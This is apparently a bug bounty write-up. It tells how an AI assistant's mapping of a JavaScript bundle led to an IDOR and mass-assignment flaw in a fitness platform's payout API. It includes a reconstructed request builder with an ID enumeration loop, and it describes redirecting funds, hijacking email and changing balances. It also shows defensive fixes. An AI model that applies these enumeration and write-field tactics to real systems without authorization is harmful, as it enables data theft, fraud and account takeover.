TL;DR: I fed a JavaScript bundle to Claude Desktop (I use Burp MCP with Claude). It mapped hidden endpoints I'd missed after multiple reviews. That single nudge led me down a rabbit hole: predictable user IDs leaking PII of high-profile individuals, and write operations that allowed fund redirection, email hijacking, and balance manipulation. The AI didn't find the bug — but it handed me the flashlight.

Fun fact: I had reviewed this JavaScript file multiple times before without catching the vulnerable endpoint. It wasn't until I fed the code to Claude that it mapped out the endpoint structure and helped me craft a valid request. The AI didn't find the vulnerability itself — but it gave me the exact lens I needed to see what had been hiding in plain sight all along.

The Target

A private bug bounty program for a fitness company. Think celebrities, athletes, and executives as users. The platform handles memberships, payouts, and partner programs — real money flowing through real APIs.

The program name stays redacted. You know the rules.

Step 1: Let the AI Read What I Couldn't See

I'm a firm believer in reading JavaScript manually. Automated scanners are great, but they don't think. The problem? Sometimes neither do I — at least not after staring at the same minified bundle for the third time.

So I tried something different. I dropped the JS file into Claude and asked it to analyze the code, enumerate API endpoints, craft requests, and identify anything interesting.

Within seconds, it came back with a structured breakdown: endpoint paths, HTTP methods, parameter schemas, and even built me a valid POST request to test one particularly juicy route tied to a financial feature.
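The grunt work here is mechanical enough that you can approximate a first pass yourself. A minimal sketch of that kind of extraction, using a regex over the bundle (the sample string and path prefix are illustrative, not the target's actual code):

```python
import re

def extract_endpoints(bundle: str) -> list[str]:
    # Match string literals that look like API paths, e.g. "/api/v2/accounts".
    # Minified bundles keep these as plain strings, so a regex pass finds most of them.
    pattern = re.compile(r'["\'](/api/[\w\-/{}]+)["\']')
    return sorted({m.group(1) for m in pattern.finditer(bundle)})

sample = 'fetch("/api/v2/accounts").then(r=>r.json());post("/api/v2/payouts/update",d)'
print(extract_endpoints(sample))
# → ['/api/v2/accounts', '/api/v2/payouts/update']
```

A regex only gets you the paths, though. What the AI added on top was the part a grep can't do: pairing each path with its HTTP method and parameter schema from the surrounding call sites.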

I had literally been looking at this same code. Multiple times. And missed it.


Lesson learned: sometimes a second pair of eyes doesn't need to be human.

Step 2: The IDOR — "Wait, That's Not My Account"

Armed with the AI-crafted request, I hit the endpoint using my own account ID — a simple numeric value. The response was generous:

→ Full name
→ Email address
→ Bank account identifier
→ Account balance
→ Internal account status

Cool. Now let me just change that ID by one…

Same data. Different person. No authorization check. The server didn't care who was asking — only what ID was provided.

I kept incrementing. Every single request returned a complete profile with financial details. And the accounts I was seeing? These weren't test users. These were high-profile individuals — the kind of people whose data breach makes headlines.
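For readers who haven't exploited an IDOR like this before, here's roughly what the request shape looked like. Everything specific is hypothetical (host, path, and field names are redacted and reconstructed); only the structure mirrors what the JS revealed:

```python
import json
from urllib.request import Request, urlopen

# Hypothetical reconstruction -- the real host, path, and field names
# are redacted. Only the request *shape* matches the write-up.
ENDPOINT = "https://target.example/api/v2/accounts/lookup"

def build_request(account_id: int, token: str) -> Request:
    # The server resolved the profile from accountId alone and never
    # checked whether the bearer token actually owned that account.
    body = json.dumps({"accountId": account_id}).encode()
    return Request(
        ENDPOINT,
        data=body,
        headers={"Authorization": f"Bearer {token}",
                 "Content-Type": "application/json"},
        method="POST",
    )

# Enumeration is a one-liner once the request shape is known
# (only ever run against accounts in your authorized testing scope):
# for account_id in range(1000, 1050):
#     profile = json.load(urlopen(build_request(account_id, MY_TOKEN)))
```

The only "authentication" that mattered was a valid session token for *any* account; authorization was simply absent.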


Step 3: "Can I Write Too?" — Spoiler: Yes

A read-only IDOR is already critical when you're leaking bank details of public figures. But I wanted the full picture.

I went back to the AI assistant, this time asking it to help me understand which parameters the endpoint would accept for modification. It helped me map the writable fields based on the JS source.

Then I tested three things:

Fund Redirection — I modified the bank account parameter. The server accepted it. Just like that, payouts could be rerouted to any account. Mine, yours, anyone's.

Email Hijacking — Changed the email field on a target account. Now trigger a password reset, catch it in your inbox, and you own the account. Classic, devastating, and entirely preventable.

Balance Manipulation — This one surprised even me. The balance field was writable. I could set it to zero. I could set it to a million. The server said "sure, sounds good" every single time.
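All three writes point at the same root cause. The server behaved as if its update handler did something like the following anti-pattern (a speculative sketch of the bug class, not the program's actual code):

```python
# Mass-assignment anti-pattern: every client-supplied key is copied
# straight into the stored record, so "protected" fields are writable.
def update_account_vulnerable(record: dict, client_json: dict) -> dict:
    record.update(client_json)  # bankAccount, email, balance included
    return record

account = {"id": 7, "email": "owner@example.com",
           "balance": 100, "bankAccount": "LEGIT-IBAN"}
update_account_vulnerable(account, {"bankAccount": "ATTACKER-IBAN",
                                    "balance": 1_000_000})
print(account["balance"])  # → 1000000
```

One generic "merge the request body into the record" code path, and every sensitive field becomes attacker-controlled.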


The Kill Chain

Read JS with AI assistance → Discover hidden endpoint + valid request structure
      ↓
Send POST with sequential ID → Full PII of any user
      ↓
Enumerate IDs → Mass data exfiltration
      ↓
Modify bank account → Redirect funds
Modify email → Account takeover
Modify balance → Financial fraud

One JavaScript file. One AI conversation. Total compromise.

Why This Happened

Three classic failures stacked on top of each other:

No authorization. The API trusted the client to only ask for its own data. Spoiler: attackers don't follow the honor system.

Predictable IDs. Sequential integers as user identifiers. Enumeration was as simple as a for loop.

Mass assignment. The API let clients write to fields that should never be client-controlled — bank accounts, emails, balances. No allowlist, no validation, no separate workflow for sensitive changes.
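The third failure has a textbook fix: a server-side allowlist, with sensitive changes routed through their own verified workflows. A minimal sketch, with illustrative field names:

```python
# Only fields a client may legitimately set. Sensitive fields (email,
# balance, bankAccount) should never appear here -- email changes need
# re-verification, and balances should never be client-writable at all.
ALLOWED_CLIENT_FIELDS = {"displayName", "timezone"}

def update_account_safe(record: dict, client_json: dict) -> dict:
    # Copy only explicitly allowlisted keys; silently ignore the rest
    # (or reject the whole request, depending on your API's contract).
    for key in client_json.keys() & ALLOWED_CLIENT_FIELDS:
        record[key] = client_json[key]
    return record

account = {"id": 7, "balance": 100, "displayName": "old"}
update_account_safe(account, {"displayName": "new", "balance": 9_999_999})
print(account)  # balance untouched, displayName updated
```

Pair that with real per-object authorization checks and non-guessable identifiers, and all three links in the kill chain break.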

The AI Factor

I want to be transparent about this because I think it matters for the community.

The AI didn't "hack" anything. It didn't exploit the vulnerability or even flag it as a security issue. What it did was process information faster and more systematically than I could on my fourth pass through minified JavaScript.

It enumerated every endpoint, organized them by HTTP method, identified parameter structures, and built me a working request. That's the kind of grunt work that usually takes an hour of squinting at obfuscated code — done in seconds.

The vulnerability discovery, the intuition to test for write access, the escalation strategy — that was all human judgment. But the starting point? That came from an AI reading code I'd already given up on.

If you're not using AI as part of your recon workflow, you're leaving bugs on the table. In my case, a four-figure one.


Final Thoughts

Read the JavaScript and go deep in your target. If you've already read it — feed it to an AI and read it again. The bugs aren't hiding in the code you haven't seen. They're hiding in the code you've already looked at and dismissed.

After this, I definitely bought a Claude Pro subscription.

And when you find a read, always check for a write. That's where the severity jumps from "interesting" to "bug-bounty-journey-defining."

Happy hunting.

If you found this write-up useful, feel free to connect with me. I'm always happy to discuss methodology, share recon tips, or just talk.